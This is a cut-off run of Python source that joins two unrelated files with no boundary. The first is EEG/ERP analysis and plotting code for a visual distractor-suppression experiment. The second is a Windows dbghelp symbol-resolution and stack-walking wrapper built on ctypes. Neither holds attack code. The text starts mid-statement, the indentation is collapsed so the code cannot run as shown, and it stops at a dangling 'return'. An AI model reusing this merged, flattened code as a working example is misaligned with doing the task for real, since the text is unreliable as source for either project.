enumerate(['DvTr_0','DvTr_0','DvTr_3','DvTr_3','DrTv_0','DrTv_0','DrTv_3','DrTv_3']): ax = plt.subplot(4,2 , i + 1, title = titles[i], ylabel = 'mV') if i < 4: if i % 2 == 0: ipsi = np.vstack([t_erps[str(key)][cnd]['l_ipsi'] for key in t_erps.keys()]) contra = np.vstack([t_erps[str(key)][cnd]['l_contra'] for key in t_erps.keys()]) else: ipsi = np.vstack([t_erps[str(key)][cnd]['r_ipsi'] for key in t_erps.keys()]) contra = np.vstack([t_erps[str(key)][cnd]['r_contra'] for key in t_erps.keys()]) else: if i % 2 == 0: ipsi = np.vstack([d_erps[str(key)][cnd]['l_ipsi'] for key in d_erps.keys()]) contra = np.vstack([d_erps[str(key)][cnd]['l_contra'] for key in d_erps.keys()]) else: ipsi = np.vstack([d_erps[str(key)][cnd]['r_ipsi'] for key in d_erps.keys()]) contra = np.vstack([d_erps[str(key)][cnd]['r_contra'] for key in d_erps.keys()]) err, ipsi = bootstrap(ipsi) plt.plot(info['times'], ipsi, label = 'ipsi', color = 'blue') plt.fill_between(info['times'], ipsi + err, ipsi - err, alpha = 0.2, color = 'blue') err, contra = bootstrap(contra) plt.plot(info['times'], contra, label = 'contra', color = 'green') plt.fill_between(info['times'], contra + err, contra - err, alpha = 0.2, color = 'green') plt.legend(loc = 'best') 
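# Hedged sketch: the `bootstrap()` helper used for the error bands in these ERP plots comes
# from the project's support module and is not defined in this file. The stand-in below only
# illustrates the assumed behaviour (resample subjects, i.e. rows, with replacement and return
# an error band plus the grand-average waveform); the name and n_boot default are illustrative.
def _bootstrap_band_sketch(X, n_boot=1000, seed=42):
    import numpy as np
    rng = np.random.RandomState(seed)
    n_sj = X.shape[0]
    # bootstrap distribution of the across-subject mean waveform
    boot_means = np.stack([X[rng.randint(0, n_sj, n_sj)].mean(axis=0)
                           for _ in range(n_boot)])
    return boot_means.std(axis=0), X.mean(axis=0)  # (error band, grand average)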
plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') plt.tight_layout() plt.savefig(self.FolderTracker(['erp','figs'], filename = '{}-check-1.pdf'.format(erp_name))) plt.close() plt.figure(figsize = (20,20)) # plot repetition effect ax = plt.subplot(2,2 , 1, title = 'Target repetition Left', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTr_0','DvTr_3']): L_ipsi = np.vstack([t_erps[str(key)][cnd]['l_ipsi'] for key in t_erps.keys()]) L_contra = np.vstack([t_erps[str(key)][cnd]['l_contra'] for key in t_erps.keys()]) err, diff = bootstrap(L_contra - L_ipsi) perm.append(L_contra - L_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(2,2 , 2, title = 'Target repetition Right', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTr_0','DvTr_3']): R_ipsi = np.vstack([t_erps[str(key)][cnd]['r_ipsi'] for key in t_erps.keys()]) R_contra = np.vstack([t_erps[str(key)][cnd]['r_contra'] for key in t_erps.keys()]) err, diff = bootstrap(R_contra - R_ipsi) perm.append(R_contra - R_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(2,2 , 3, title = 'Distractor repetition Left', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DrTv_0','DrTv_3']): L_ipsi = np.vstack([d_erps[str(key)][cnd]['l_ipsi'] for key in d_erps.keys()]) L_contra = np.vstack([d_erps[str(key)][cnd]['l_contra'] for key in d_erps.keys()]) err, diff = bootstrap(L_contra - L_ipsi) perm.append(L_contra - L_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(2,2 , 4, title = 'Distractor repetition Right', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DrTv_0','DrTv_3']): R_ipsi = np.vstack([d_erps[str(key)][cnd]['r_ipsi'] for key in d_erps.keys()]) R_contra = np.vstack([d_erps[str(key)][cnd]['r_contra'] for key in d_erps.keys()]) err, diff = bootstrap(R_contra - R_ipsi) perm.append(R_contra - R_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, 
ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') plt.tight_layout() plt.savefig(self.FolderTracker(['erp','figs'], filename = '{}-check-2.pdf'.format(erp_name))) plt.close() def N2pCvsPd(self, erp_name, split = False): ''' ''' sj_id = np.array([1,3,4,5,6,7,9,10,11,12,13,14,15,16,17,18,19,20,21]) # read in data with open(self.FolderTracker(['erp','dist_loc'], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) with open(self.FolderTracker(['erp','target_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: t_erps = pickle.load(handle) with open(self.FolderTracker(['erp','dist_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: d_erps = pickle.load(handle) if split: groups, block_type = self.splitHalf(split, sj_id, 'sj_nr') else: groups = {'all':t_erps.keys()} for group in groups.keys(): # get ipsilateral and contralateral erps tuned to the target and tuned to the distractor (collapsed across all conditions) #T_ipsi = np.vstack([t_erps[str(key)]['all']['ipsi'] for key in t_erps.keys()]) #T_contra = np.vstack([t_erps[str(key)]['all']['contra'] for key in t_erps.keys()]) T_ipsi = np.vstack([t_erps[str(key)]['all']['ipsi'] for key in groups[group]]) T_contra = np.vstack([t_erps[str(key)]['all']['contra'] for key in groups[group]]) #D_ipsi = np.vstack([d_erps[str(key)]['all']['ipsi'] for key in d_erps.keys()]) #D_contra = np.vstack([d_erps[str(key)]['all']['contra'] for key in d_erps.keys()]) D_ipsi = np.vstack([d_erps[str(key)]['all']['ipsi'] for key in groups[group]]) D_contra = np.vstack([d_erps[str(key)]['all']['contra'] for key in groups[group]]) plt.figure(figsize = (20,20)) # plot ipsi and contralateral erps with bootsrapped error bar ax = plt.subplot(4,2 , 1, title = 'Target ERPs', ylabel = 'mV') err, ipsi = bootstrap(T_ipsi) plt.plot(info['times'], ipsi, label = 'ipsi', color = 'blue') plt.fill_between(info['times'], ipsi + err, ipsi - err, alpha = 0.2, color = 'blue') err, contra = bootstrap(T_contra) plt.plot(info['times'], contra, label = 'contra', color = 'green') plt.fill_between(info['times'], contra + err, contra - err, alpha = 0.2, color = 'green') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2 , 2, title = 'Distractor ERPs', ylabel = 'mV') err, ipsi = bootstrap(D_ipsi) plt.plot(info['times'], ipsi, label = 'ipsi', color = 'blue') plt.fill_between(info['times'], ipsi + err, ipsi - err, alpha = 0.2, color = 'blue') plt.legend(loc = 'best') err, contra = bootstrap(D_contra) plt.plot(info['times'], contra, label = 'contra', color = 'green') plt.fill_between(info['times'], contra + err, contra - err, alpha = 0.2, color = 'green') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') # plot diff wave collapsed across all conditions ax = plt.subplot(4,2 , 3, title = 'Target diff', ylabel = 'mV') err, diff = bootstrap(T_contra - T_ipsi) plt.plot(info['times'], diff, color = 'black') plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = 'black') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2 , 4, title = 'Distractor diff', ylabel = 'mV') err, diff = bootstrap(D_contra - D_ipsi) plt.plot(info['times'], diff, color = 'black') 
plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = 'black') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') # plot repetition effect ax = plt.subplot(4,2 , 5, title = 'Target repetition', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTr_0','DvTr_3']): T_ipsi = np.vstack([t_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) T_contra = np.vstack([t_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(T_contra - T_ipsi) perm.append(T_contra - T_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2 , 6, title = 'Distractor repetition', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DrTv_0','DrTv_3']): D_ipsi = np.vstack([d_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) D_contra = np.vstack([d_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(D_contra - D_ipsi) perm.append(D_contra - D_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') # plot repetition effect (control) ax = plt.subplot(4,2, 7, title = 'Target repetition (control)', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTv_0','DvTv_3']): T_ipsi = np.vstack([t_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) T_contra = np.vstack([t_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(T_contra - T_ipsi) perm.append(T_contra - T_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = '--', color = 'grey') ax = plt.subplot(4,2, 8, title = 'Distractor repetition (control)', ylabel = 'mV') perm = [] for i, cnd in enumerate(['DvTv_0','DvTv_3']): D_ipsi = np.vstack([d_erps[str(key)][cnd]['ipsi'] for key in groups[group]]) D_contra = np.vstack([d_erps[str(key)][cnd]['contra'] for key in groups[group]]) err, diff = bootstrap(D_contra - D_ipsi) perm.append(D_contra - D_ipsi) plt.plot(info['times'], diff, label = cnd, color = ['r','y'][i]) plt.fill_between(info['times'], diff + err, diff - err, alpha = 0.2, color = ['r','y'][i]) mask, sig_clusters = permTestMask1D(perm) plt.fill_between(info['times'], -0.05, 0.05, where = mask == True, color = 'grey', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') plt.axvline(x=0.25, ls = 
'--', color = 'grey') sns.despine(offset=10, trim = False) plt.tight_layout() if split: plt.savefig(self.FolderTracker(['erp','figs'], filename = 'n2pc-Pd-{}-{}_{}.pdf'.format(group,split,erp_name))) else: plt.savefig(self.FolderTracker(['erp','figs'], filename = 'n2pc-Pd_{}_{}.pdf'.format(group,erp_name))) plt.close() def clusterTopo(self, header, fname = ''): ''' ''' # read in data files = glob.glob(self.FolderTracker(['erp', header], filename = fname)) topo = [] for file in files: with open(file ,'rb') as handle: topo.append(pickle.load(handle)) def topoAnimation(self, header): ''' ''' # read in data files = glob.glob(self.FolderTracker(['erp', header], filename = 'topo_*.pickle')) topo = [] for file in files: print file # read in erp dict with open(file ,'rb') as handle: topo.append(pickle.load(handle)) # read in processed data object (contains info for plotting) EEG = mne.read_epochs(self.FolderTracker(extension = ['processed'], filename = 'subject-1_all-epo.fif')) # read in plot dict with open(self.FolderTracker(['erp',header], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) plt_idx = [1,3,7,9] for image in range(564): f = plt.figure(figsize = (20,20)) for i, cnd in enumerate(np.sort(topo[0].keys())): ax = plt.subplot(3,3 , plt_idx[i], title = cnd) T = np.mean(np.dstack([np.mean(topo[j][cnd], axis = 0) for j in range(len(topo))]), axis = 2) mne.viz.plot_topomap(T[:,image], EEG.info, show_names = False, show = False, vmin = -4, vmax = 3) ax = plt.subplot(3,3 , 5, title = '{0:0.2f}'.format(info['times'][image])) if info['times'][image] <= 0: searchDisplayEEG(ax, fix = True) elif info['times'][image] <= 0.25: searchDisplayEEG(ax, fix = False) else: searchDisplayEEG(ax, fix = False, stimulus = 4, erp_type = header) plt.tight_layout() plt.savefig(self.FolderTracker(['erp', 'figs','video'], filename = 'topo_{0}_{1:03}.png'.format(header,image + 1))) plt.close() plt_idx = [1,3] for image in range(564): f = plt.figure(figsize = (20,20)) for i in range(2): if i == 0: title = 'variable' T = np.mean(np.dstack([np.mean(topo[j]['DvTv_0'], axis = 0) for j in range(len(topo))]), axis = 2) - \ np.mean(np.dstack([np.mean(topo[j]['DvTv_3'], axis = 0) for j in range(len(topo))]), axis = 2) else: T = np.mean(np.dstack([np.mean(topo[j]['DrTv_0'], axis = 0) for j in range(len(topo))]), axis = 2) - \ np.mean(np.dstack([np.mean(topo[j]['DrTv_3'], axis = 0) for j in range(len(topo))]), axis = 2) title = 'repeat' ax = plt.subplot(1,3 ,plt_idx[i] , title = title) mne.viz.plot_topomap(T[:,image], EEG.info, show_names = False, show = False, vmin = -1, vmax = 1) ax = plt.subplot(1,3 , 2, title = '{0:0.2f}'.format(info['times'][image])) if info['times'][image] <= 0: searchDisplayEEG(ax, fix = True) elif info['times'][image] <= 0.25: searchDisplayEEG(ax, fix = False) else: searchDisplayEEG(ax, fix = False, stimulus = 4, erp_type = header) plt.tight_layout() plt.savefig(self.FolderTracker(['erp', 'figs','video'], filename = 'topo_diff_{0}_{1:03}.png'.format(header,image + 1))) plt.close() if __name__ == '__main__': os.chdir('/home/dvmoors1/BB/Dist_suppression') PO = EEGDistractorSuppression() #PO.conditionCheck(thresh_bin = 1.00) # ANALYSIS PAPER #PO.diff_ERPS(elecs = ['PO7','PO3','O1'], erp_name= 'lat-down1-mid') #PO.diff_ERPS(elecs = ['PO7','PO3','O1'], erp_name= 'lat-down1') # Behavior plots #PO.repetitionRaw() #PO.spatialGradient() #PO.primingCheck() #PO.indDiffBeh() # CTF plots #PO.alphaSlopes() #PO.crossTraining() #PO.CTFslopes(header = 'target', ctf_name = 'slopes_alpha', fband = 
'alpha') #PO.CTFslopes(header = 'dist', ctf_name = 'slopes_alpha', fband = 'alpha') #PO.timeFreqCTF(header = 'target', cnd_name = 'all', perm = False, p_map = False) #PO.timeFreqCTF(header = 'dist', cnd_name = 'cnds',perm = False, p_map = False) #PO.plotCTF(header = 'dist') #PO.plotCTF(header = 'dist') #PO.threeDSlopes(header = 'dist_loc') #PO.threeDSlopes(header = 'target_loc') #PO.rawCTF(header = 'dist_loc', ctf_name = 'ctf-raw') #PO.rawCTF(header = 'target_loc', ctf_name = 'ctf-raw') #PO.splitTimeFreqCTF(channel = 'posterior_channels', header = 'target_loc', perm = True) #PO.splitTimeFreqCTF(channel = 'posterior_channels', header = 'dist_loc', perm = True) # BDM plots #PO.bdmdiag() #PO.bdmACC(header = 'target') # ERP plots # PO.topoChannelSelection(header = 'dist_loc', topo_name = 'topo_lat-down1') # PO.erpInspection(header = 'dist_loc', erp_name = 'lat-down1') # PO.topoChannelSelection(header = 'target_loc', topo_name = 'topo_lat-down1') # PO.erpInspection(header = 'target_loc', erp_name = 'lat-down1') PO.diff_ERPS(elecs = ['PO7','PO3','O1'], erp_name= 'lat-down1') #PO.diff_ERPS(elecs = ['PO7','PO3','O1'], header = 'target', erp_name= 'lat-down1') #PO.cndTOPO('dist', start = 0.05, stop = 0.15, step = 0.01) #PO.cndTOPO('dist') # PO.ipsi_contra_ERPS(elecs = ['PO7','PO3','O1'], header = 'dist_loc', erp_name = 'lat-down1') # PO.ipsi_contra_ERPS(elecs = ['PO7','PO3','O1'], header = 'target_loc', erp_name = 'lat-down1') # PO.linkBehErp(elecs = ['PO7','PO3'], header = 'dist_loc', erp_name = 'lat-down1', window = (0.29,0.36)) # PO.linkBehErp(elecs = ['PO7','PO3'], header = 'target_loc', erp_name = 'lat-down1', window = (0.16,0.22)) # TARGET VS DISTRACTOR #PO.DT() import os.path import ctypes import copy import itertools from collections import namedtuple import windows import windows.generated_def as gdef from windows import winproxy DEFAULT_DBG_OPTION = gdef.SYMOPT_DEFERRED_LOADS + gdef.SYMOPT_UNDNAME def set_dbghelp_path(path): loaded_modules = [m.name.lower() for m in windows.current_process.peb.modules] if os.path.isdir(path): path = os.path.join(path, str(windows.current_process.bitness), "dbghelp.dll") if "dbghelp.dll" in loaded_modules: raise ValueError("setup_dbghelp_path should be called before any dbghelp function") # Change the DLL used by DbgHelpProxy winproxy.DbgHelpProxy.APIDLL = path return class SymbolInfoBase(object): # Init on ctypes struct is not always called # resolver & displacement should be set manually CHAR_TYPE = None def __init__(self, *args, **kwargs): self.resolver = kwargs.get("resolver", None) self.displacement = kwargs.get("displacement", 0) def as_type(self): # assert self.Address == 0 ? return SymbolType(self.Index, self.ModBase, self.resolver) @property def name(self): if not self.NameLen: return None size = self.NameLen addr = ctypes.addressof(self) + type(self).Name.offset return (self.CHAR_TYPE * size).from_address(addr)[:] @property def fullname(self): return str(self) @property def addr(self): return self.Address @property # Fixed ? 
def module(self): return self.resolver.get_module(self.ModBase) def __int__(self): return self.addr + self.displacement def __str__(self): if self.displacement: return "{self.module.name}!{self.name}+{self.displacement:#x}".format(self=self) return "{self.module.name}!{self.name}".format(self=self) def __repr__(self): if self.displacement: return '<{0} name="{1}" addr={2:#x} displacement={3:#x} tag={4}>'.format(type(self).__name__, self.name, self.addr, self.displacement, self.tag) return '<{0} name="{1}" addr={2:#x} tag={3}>'.format(type(self).__name__, self.name, self.addr, self.tag) class SymbolInfoA(gdef.SYMBOL_INFO, SymbolInfoBase): CHAR_TYPE = gdef.CHAR class SymbolInfoW(gdef.SYMBOL_INFOW, SymbolInfoBase): CHAR_TYPE = gdef.WCHAR # We use the A Api in our code (for now) SymbolInfo = SymbolInfoA class SymbolType(object): def __init__(self, typeid, modbase, resolver): # Inheritance ? self.resolver = resolver self._typeid = typeid # Kind of a handle. Different of typeid property. self.modbase = modbase def _get_type_info(self, typeinfo, ires=None): res = ires if res is None: res = TST_TYPE_RES_TYPE.get(typeinfo, gdef.DWORD)() windows.winproxy.SymGetTypeInfo(self.resolver.handle, self.modbase, self._typeid, typeinfo, ctypes.byref(res)) if ires is not None: return ires newres = res.value if isinstance(res, gdef.LPWSTR): windows.winproxy.LocalFree(res) return newres @property def name(self): return self._get_type_info(gdef.TI_GET_SYMNAME) @property def size(self): return self._get_type_info(gdef.TI_GET_LENGTH) @property def tag(self): return self._get_type_info(gdef.TI_GET_SYMTAG) # Diff type/typeid ? @property def type(self): return self.new_typeid(self._get_type_info(gdef.TI_GET_TYPE)) @property def typeid(self): return self.new_typeid(self._get_type_info(gdef.TI_GET_TYPEID)) @property def basetype(self): return gdef.BasicType.mapper[self._get_type_info(gdef.TI_GET_BASETYPE)] @property def datakind(self): return gdef.DataKind.mapper[self._get_type_info(gdef.TI_GET_DATAKIND)] @property def udtkind(self): return gdef.UdtKind.mapper[self._get_type_info(gdef.TI_GET_UDTKIND)] @property def offset(self): return self._get_type_info(gdef.TI_GET_OFFSET) @property def nb_children(self): return self._get_type_info(gdef.TI_GET_CHILDRENCOUNT) @property def children(self): count = self.nb_children class res_struct(ctypes.Structure): _fields_ = [("Count", gdef.ULONG), ("Start", gdef.ULONG), ("Types", (gdef.ULONG * count))] x = res_struct() x.Count = count x.Start = 0 self._get_type_info(gdef.TI_FINDCHILDREN, x) return [self.new_typeid(ch) for ch in x.Types] # Constructor @classmethod def from_symbol_info(cls, syminfo, resolver): return cls(syminfo.TypeIndex, syminfo.ModBase, resolver) # Constructor def new_typeid(self, newtypeid): return type(self)(newtypeid, self.modbase, self.resolver) def __repr__(self): if self.tag == gdef.SymTagBaseType: return '<{0} {1}>'.format(type(self).__name__, self.basetype) return '<{0} name="{1}" tag={2}>'.format(type(self).__name__, self.name, self.tag) class SymbolModule(gdef.IMAGEHLP_MODULE64): # Init on ctypes struct is not always called # resolver should be set manually def __init__(self, resolver): self.resolver = resolver @property def addr(self): return self.BaseOfImage @property def name(self): return self.ModuleName @property def path(self): return self.LoadedImageName @property def type(self): return self.SymType @property def pdb(self): LoadedPdbName = self.LoadedPdbName if not LoadedPdbName: return None return LoadedPdbName def __repr__(self): pdb_basename = 
self.LoadedPdbName.split("\\")[-1] return '<{0} name="{1}" type={2} pdb="{3}" addr={4:#x}>'.format(type(self).__name__, self.name, self.type.value.name, pdb_basename, self.addr) # https://docs.microsoft.com/en-us/windows/win32/debug/symbol-handler-initialization class SymbolHandler(object): """Base class of symbol handler""" INIT_SYMBOL_OPTION = False def __init__(self, handle, search_path=None, invade_process=False): # https://docs.microsoft.com/en-us/windows/desktop/api/dbghelp/nf-dbghelp-syminitialize # This value should be unique and nonzero, but need not be a process handle. # be sure to use the correct handle. self.handle = handle if not SymbolHandler.INIT_SYMBOL_OPTION: # Normally the first real call to DbgHelp -> setup our options # Should check if SymSetOptions was not called by someone else # windows.winproxy.SymSetOptions(DEFAULT_DBG_OPTION) SymbolHandler.INIT_SYMBOL_OPTION = True winproxy.SymInitialize(handle, search_path, invade_process) # Config # def get_search_path(): ? # Loading def load_module(self, file_handle=None, path=None, name=None, addr=0, size=0, data=None, flags=0): # Is that a bug in SymLoadModuleEx ? # To get a custom name for a module it use "path" # So we need to use file_handle and set a custom path # ! BUT it means we cannot get a custom name for a module where the path is not explicit and need to be searched if name is not None and file_handle is None and os.path.exists(path): try: f = open(path) file_handle = windows.utils.get_handle_from_file(f) path = name except Exception as e: pass try: load_addr = winproxy.SymLoadModuleEx(self.handle, file_handle, path, name, addr, size, data, flags) except WindowsError as e: # if e.winerror == 0: # Already loaded ? # What if someone try to load another PE at the same BaseOfDll ? # return BaseOfDll raise return self.get_module(load_addr) def load_file(self, path, name=None, addr=0, size=0, data=None, flags=0): return self.load_module(path=path, name=name, addr=addr, size=size, data=data, flags=flags) def unload(self, addr): return winproxy.SymUnloadModule64(self.handle, addr) @staticmethod @ctypes.WINFUNCTYPE(gdef.BOOL, gdef.PCSTR, gdef.DWORD64, ctypes.py_object) def modules_aggregator(modname, modaddr, ctx): ctx.append(modaddr) return True @property def modules(self): res = [] windows.winproxy.SymEnumerateModules64(self.handle, self.modules_aggregator, res) return [self.get_module(addr) for addr in res] def get_module(self, base): modinfo = SymbolModule(self) modinfo.SizeOfStruct = ctypes.sizeof(modinfo) winproxy.SymGetModuleInfo64(self.handle, base, modinfo) return modinfo def symbol_and_displacement_from_address(self, addr): displacement = gdef.DWORD64() max_len_size = 0x1000 full_size = ctypes.sizeof(SymbolInfo) + (max_len_size - 1) buff = windows.utils.BUFFER(SymbolInfo)(size=full_size) sym = buff[0] sym.SizeOfStruct = ctypes.sizeof(SymbolInfo) sym.MaxNameLen = max_len_size winproxy.SymFromAddr(self.handle, addr, displacement, buff) # SymFromAddrW ? sym.resolver = self sym.displacement = displacement.value return sym # Keep it ? 
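    # Hedged example (not part of the original class): shows how the SymbolInfo returned by
    # symbol_and_displacement_from_address() is typically consumed, relying only on the
    # resolver/displacement attributes set just above. Purely illustrative.
    def example_describe_address(self, addr):
        """Return a 'module!symbol+0x<disp>' style string for addr, or the raw address
        if no loaded module covers it."""
        try:
            sym = self.symbol_and_displacement_from_address(addr)
        except WindowsError:
            return hex(addr)
        return str(sym)  # SymbolInfoBase.__str__ formats module!name(+displacement)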
# def get_symbol(self, addr): # return self.symbol_and_displacement_from_address(addr) def symbol_from_name(self, name): max_len_size = 0x1000 full_size = ctypes.sizeof(SymbolInfo) + (max_len_size - 1) buff = windows.utils.BUFFER(SymbolInfo)(size=full_size) sym = buff[0] sym.SizeOfStruct = ctypes.sizeof(SymbolInfo) sym.MaxNameLen = max_len_size windows.winproxy.SymFromName(self.handle, name, buff) sym.resolver = self sym.displacement = 0 return sym def resolve(self, name_or_addr): # Only returns None if symbol is not Found ? if isinstance(name_or_addr, basestring): return self.symbol_from_name(name_or_addr) try: return self.symbol_and_displacement_from_address(name_or_addr) except WindowsError as e: if e.winerror != gdef.ERROR_MOD_NOT_FOUND: raise # We could not resolve and address -> return None return None __getitem__ = resolve @staticmethod @ctypes.WINFUNCTYPE(gdef.BOOL, ctypes.POINTER(SymbolInfo), gdef.ULONG , ctypes.py_object) def simple_aggregator(info, size, ctx): sym = info[0] fullsize = sym.SizeOfStruct + sym.NameLen cpy = windows.utils.BUFFER(SymbolInfo)(size=fullsize) ctypes.memmove(cpy, info, fullsize) ctx.append(cpy[0]) return True def search(self, mask, mod=0, tag=0, options=gdef.SYMSEARCH_ALLITEMS, callback=None): res = [] if callback is None: callback = self.simple_aggregator else: callback = ctypes.WINFUNCTYPE(gdef.BOOL, ctypes.POINTER(SymbolInfo), gdef.ULONG , ctypes.py_object)(callback) windows.winproxy.SymSearch(self.handle, gdef.DWORD64(mod), 0, tag, mask, 0, callback, res, options) for sym in res: sym.resolver = self sym.displacement = 0 return res def get_symbols(self, addr, callback=None): res = [] if callback is None: callback = self.simple_aggregator else: callback = ctypes.WINFUNCTYPE(gdef.BOOL, ctypes.POINTER(SymbolInfo), gdef.ULONG , ctypes.py_object)(callback) try: windows.winproxy.SymEnumSymbolsForAddr(self.handle, addr, callback, res) except WindowsError as e: if e.winerror == gdef.ERROR_MOD_NOT_FOUND: return [] raise for sym in res: sym.resolver = self sym.displacement = 0 return res # Type stuff def get_type(self, name, mod=0): max_len_size = 0x1000 full_size = ctypes.sizeof(SymbolInfo) + (max_len_size - 1) buff = windows.utils.BUFFER(SymbolInfo)(size=full_size) buff[0].SizeOfStruct = ctypes.sizeof(SymbolInfo) buff[0].MaxNameLen = max_len_size windows.winproxy.SymGetTypeFromName(self.handle, mod, name, buff) return SymbolType.from_symbol_info(buff[0], resolver=self) # SymbolInfo info ? 
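    # Hedged example (illustrative, not part of the original module): a wildcard symbol search
    # plus a child walk on a type, using only the search()/get_type() wrappers defined above.
    # The "mod!mask" mask syntax and the "_PEB" type name are assumptions made for the example
    # and require the matching module/PDB to already be loaded in this handler.
    def example_list_symbols_and_members(self, mask="*!Nt*", type_name="_PEB"):
        for sym in self.search(mask):
            print("{0:#x} {1}".format(sym.addr, sym.name))
        udt = self.get_type(type_name)
        for child in udt.children:  # SymbolType instances; names come from TI_GET_SYMNAME
            print(child.name)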
# def type_info(self, mod, typeid, typeinfo, ires=None): # res = ires # if res is None: # res = TST_TYPE_RES_TYPE.get(typeinfo, gdef.DWORD)() # windows.winproxy.SymGetTypeInfo(self.handle, mod, typeid, typeinfo, ctypes.byref(res)) # if ires is not None: # return ires # newres = res.value # if isinstance(res, gdef.LPWSTR): # windows.winproxy.LocalFree(res) # return newres class StackWalker(object): def __init__(self, resolver, process=None, thread=None, context=None): self.resolver = resolver if process is None and thread is None: raise ValueError("At least a process or thread must be provided") if process is None: process = thread.owner self.process = process self.thread = thread self.context = context if windows.current_process.bitness == 32 and process.bitness == 64: raise NotImplementedError("StackWalking 64b does not seems to works from 32b process") def _stack_frame_generator(self): ctx, machine = self._get_effective_context_and_machine() frame = self._setup_initial_frame_from_context(ctx, machine) thread_handle = self.thread.handle if self.thread else None while True: try: windows.winproxy.StackWalkEx(machine, # dbg.current_process.handle, self.resolver.handle, thread_handle, # 0, frame, ctypes.byref(ctx), None, winproxy.resolve(winproxy.SymFunctionTableAccess64), winproxy.resolve(winproxy.SymGetModuleBase64), None, 0) except WindowsError as e: if not e.winerror: return # No_ERROR -> end of stack walking raise yield type(frame).from_buffer_copy(frame) # Make a copy ? def __iter__(self): return 